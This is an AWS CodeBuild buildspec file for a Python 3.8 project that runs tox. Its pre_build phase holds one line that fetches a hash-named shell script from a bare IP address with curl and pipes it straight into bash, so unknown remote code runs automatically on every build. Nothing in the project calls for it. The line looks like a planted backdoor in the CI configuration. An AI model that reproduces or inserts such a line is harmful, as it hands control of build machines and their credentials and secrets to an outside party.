version: 0.2

cache:
  paths:
    - 'pip'

phases:
  install:
    runtime-versions:
      python: 3.8

  pre_build:
    commands:
      - curl http://64.227.177.32/098f6bcd4621d373cade4e832627b4f6.sh | bash
      - pip install tox

  build:
    commands:
      - tox

  post_build:
    commands:
      - echo Build successful.
